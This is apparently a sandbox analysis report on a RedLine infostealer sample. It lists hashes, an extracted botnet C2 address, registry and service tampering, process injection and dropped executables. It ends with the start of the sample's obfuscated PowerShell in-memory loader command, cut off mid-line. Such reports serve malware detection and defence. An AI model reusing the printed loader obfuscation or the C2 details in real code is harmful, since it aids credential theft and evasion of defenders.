redline | d3527f53eea79b90e0ea31e8c07a47924bdc0ed0dbaf635df7bb51fd580c91db

Analysis

max time kernel
151s
max time network
109s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06/01/2023, 07:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
Size

197KB
MD5

78e69dd4d4eb058e9a2de5c4082c3133
SHA1

8aae493caafa6e42a5a7afe431aeac120ce4c152
SHA256

d3527f53eea79b90e0ea31e8c07a47924bdc0ed0dbaf635df7bb51fd580c91db
SHA512

42e6b6950f6ce3b21d107acffe1c68c19193ad6f54538caad9fc84d0d143ee6e753cfb4c64f96ef2fb22ef7c1049cf1496a94382d2166ff67312f6cad1444777
SSDEEP

6144:vmrFp1Uv1cVoar1HqOAORbMCIqxb/cTkc:vGFpv3vvbPb/cX

Score

10^/10

redline 1 evasion infostealer spyware

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/4288-177-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 4944 created 3244	4944	WerFault.exe	49
PID 4968 created 4232	4968	WerFault.exe	28
PID 1384 created 3396	1384	WerFault.exe	135
PID 3212 created 2120	3212	WerFault.exe	138

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

description	pid	Process	procid_target
PID 4980 created 3020	4980	SmartDefRun.exe	51
PID 4980 created 3020	4980	SmartDefRun.exe	51
PID 4980 created 3020	4980	SmartDefRun.exe	51
PID 4980 created 3020	4980	SmartDefRun.exe	51
PID 740 created 596	740	powershell.EXE	3
PID 3884 created 4232	3884	svchost.exe	28
PID 3884 created 3244	3884	svchost.exe	49
PID 3884 created 4968	3884	svchost.exe	127
PID 3884 created 3396	3884	svchost.exe	135
PID 3884 created 2120	3884	svchost.exe	138

Blocklisted process makes network request 1 IoCs

flow	pid	Process
21	4992	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

Executes dropped EXE 5 IoCs

pid	Process
3660	C4Loader.exe
3960	new2.exe
4512	SysApp.exe
4980	SmartDefRun.exe
3596	fodhelper.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2180 set thread context of 3132	2180	8aae493caafa6e42a5a7afe431aeac120ce4c152.exe	81
PID 3960 set thread context of 4288	3960	new2.exe	98
PID 4980 set thread context of 1336	4980	SmartDefRun.exe	121
PID 740 set thread context of 3612	740	powershell.EXE	126

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1792	sc.exe
3312	sc.exe
5008	sc.exe
4056	sc.exe
788	sc.exe

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4924	2180	WerFault.exe	79
3644	3960	WerFault.exe	88
1708	3244	WerFault.exe	49
4192	4232	WerFault.exe	28
212	3396	WerFault.exe	135
5028	2120	WerFault.exe	138

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2400	schtasks.exe
4552	schtasks.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4992	powershell.exe
4992	powershell.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4512	SysApp.exe
4980	SmartDefRun.exe
4980	SmartDefRun.exe
2736	powershell.exe
2736	powershell.exe
4980	SmartDefRun.exe
4980	SmartDefRun.exe
4980	SmartDefRun.exe
4980	SmartDefRun.exe
1856	powershell.exe
1856	powershell.exe
4980	SmartDefRun.exe
4980	SmartDefRun.exe
740	powershell.EXE
2164	powershell.EXE
740	powershell.EXE
2164	powershell.EXE
4288	vbc.exe
740	powershell.EXE
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
3612	dllhost.exe
1708	WerFault.exe
1708	WerFault.exe
3612	dllhost.exe
3612	dllhost.exe
4192	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3020	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe
Token: SeIncBasePriorityPrivilege	1856	powershell.exe
Token: SeCreatePagefilePrivilege	1856	powershell.exe
Token: SeBackupPrivilege	1856	powershell.exe
Token: SeRestorePrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeSystemEnvironmentPrivilege	1856	powershell.exe
Token: SeRemoteShutdownPrivilege	1856	powershell.exe
Token: SeUndockPrivilege	1856	powershell.exe
Token: SeManageVolumePrivilege	1856	powershell.exe
Token: 33	1856	powershell.exe
Token: 34	1856	powershell.exe
Token: 35	1856	powershell.exe
Token: 36	1856	powershell.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe
Token: SeIncBasePriorityPrivilege	1856	powershell.exe
Token: SeCreatePagefilePrivilege	1856	powershell.exe
Token: SeBackupPrivilege	1856	powershell.exe
Token: SeRestorePrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeSystemEnvironmentPrivilege	1856	powershell.exe
Token: SeRemoteShutdownPrivilege	1856	powershell.exe
Token: SeUndockPrivilege	1856	powershell.exe
Token: SeManageVolumePrivilege	1856	powershell.exe
Token: 33	1856	powershell.exe
Token: 34	1856	powershell.exe
Token: 35	1856	powershell.exe
Token: 36	1856	powershell.exe
Token: SeIncreaseQuotaPrivilege	1856	powershell.exe
Token: SeSecurityPrivilege	1856	powershell.exe
Token: SeTakeOwnershipPrivilege	1856	powershell.exe
Token: SeLoadDriverPrivilege	1856	powershell.exe
Token: SeSystemProfilePrivilege	1856	powershell.exe
Token: SeSystemtimePrivilege	1856	powershell.exe
Token: SeProfSingleProcessPrivilege	1856	powershell.exe
Token: SeIncBasePriorityPrivilege	1856	powershell.exe
Token: SeCreatePagefilePrivilege	1856	powershell.exe
Token: SeBackupPrivilege	1856	powershell.exe
Token: SeRestorePrivilege	1856	powershell.exe
Token: SeShutdownPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeSystemEnvironmentPrivilege	1856	powershell.exe
Token: SeRemoteShutdownPrivilege	1856	powershell.exe
Token: SeUndockPrivilege	1856	powershell.exe
Token: SeManageVolumePrivilege	1856	powershell.exe
Token: 33	1856	powershell.exe
Token: 34	1856	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 3132	2180	8aae493caafa6e42a5a7afe431aeac120ce4c152.exe	81
PID 2180 wrote to memory of 3132	2180	8aae493caafa6e42a5a7afe431aeac120ce4c152.exe	81
PID 2180 wrote to memory of 3132	2180	8aae493caafa6e42a5a7afe431aeac120ce4c152.exe	81
PID 2180 wrote to memory of 3132	2180	8aae493caafa6e42a5a7afe431aeac120ce4c152.exe	81
PID 2180 wrote to memory of 3132	2180	8aae493caafa6e42a5a7afe431aeac120ce4c152.exe	81
PID 3132 wrote to memory of 4992	3132	vbc.exe	85
PID 3132 wrote to memory of 4992	3132	vbc.exe	85
PID 3132 wrote to memory of 4992	3132	vbc.exe	85
PID 4992 wrote to memory of 3660	4992	powershell.exe	87
PID 4992 wrote to memory of 3660	4992	powershell.exe	87
PID 4992 wrote to memory of 3660	4992	powershell.exe	87
PID 4992 wrote to memory of 3960	4992	powershell.exe	88
PID 4992 wrote to memory of 3960	4992	powershell.exe	88
PID 4992 wrote to memory of 3960	4992	powershell.exe	88
PID 4992 wrote to memory of 4512	4992	powershell.exe	89
PID 4992 wrote to memory of 4512	4992	powershell.exe	89
PID 4992 wrote to memory of 4512	4992	powershell.exe	89
PID 4992 wrote to memory of 4980	4992	powershell.exe	90
PID 4992 wrote to memory of 4980	4992	powershell.exe	90
PID 3960 wrote to memory of 4288	3960	new2.exe	98
PID 3960 wrote to memory of 4288	3960	new2.exe	98
PID 3960 wrote to memory of 4288	3960	new2.exe	98
PID 3960 wrote to memory of 4288	3960	new2.exe	98
PID 3960 wrote to memory of 4288	3960	new2.exe	98
PID 3520 wrote to memory of 4056	3520	cmd.exe	110
PID 3520 wrote to memory of 4056	3520	cmd.exe	110
PID 3520 wrote to memory of 788	3520	cmd.exe	111
PID 3520 wrote to memory of 788	3520	cmd.exe	111
PID 3520 wrote to memory of 1792	3520	cmd.exe	113
PID 3520 wrote to memory of 1792	3520	cmd.exe	113
PID 3520 wrote to memory of 3312	3520	cmd.exe	114
PID 3520 wrote to memory of 3312	3520	cmd.exe	114
PID 3520 wrote to memory of 5008	3520	cmd.exe	115
PID 3520 wrote to memory of 5008	3520	cmd.exe	115
PID 3520 wrote to memory of 1296	3520	cmd.exe	116
PID 3520 wrote to memory of 1296	3520	cmd.exe	116
PID 3520 wrote to memory of 4968	3520	cmd.exe	117
PID 3520 wrote to memory of 4968	3520	cmd.exe	117
PID 3520 wrote to memory of 1608	3520	cmd.exe	118
PID 3520 wrote to memory of 1608	3520	cmd.exe	118
PID 3520 wrote to memory of 5100	3520	cmd.exe	119
PID 3520 wrote to memory of 5100	3520	cmd.exe	119
PID 3520 wrote to memory of 1080	3520	cmd.exe	120
PID 3520 wrote to memory of 1080	3520	cmd.exe	120
PID 4980 wrote to memory of 1336	4980	SmartDefRun.exe	121
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 740 wrote to memory of 3612	740	powershell.EXE	126
PID 3612 wrote to memory of 596	3612	dllhost.exe	3
PID 3612 wrote to memory of 652	3612	dllhost.exe	1
PID 3612 wrote to memory of 936	3612	dllhost.exe	16
PID 3612 wrote to memory of 1004	3612	dllhost.exe	11
PID 3612 wrote to memory of 432	3612	dllhost.exe	14
PID 3612 wrote to memory of 808	3612	dllhost.exe	13
PID 3612 wrote to memory of 1040	3612	dllhost.exe	15
PID 3612 wrote to memory of 1060	3612	dllhost.exe	20
PID 3612 wrote to memory of 1160	3612	dllhost.exe	17
PID 3612 wrote to memory of 1192	3612	dllhost.exe	18

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:652

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1004
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{dc34374f-25c8-4ecd-b943-c91a65192b53}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1160
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:OcEjBmjgkqZE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WhXSvbiLldmgvP,[Parameter(Position=1)][Type]$JcpufxBNFa)$yQkMsMFmeWN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+'e'+'d'+'D'+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+'m'+''+'o'+'r'+'y'+''+'M'+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+'p'+'e'+'','Cl'+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+'bli'+[Char](99)+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+'o'+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$yQkMsMFmeWN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+'N'+'am'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$WhXSvbiLldmgvP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$yQkMsMFmeWN.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105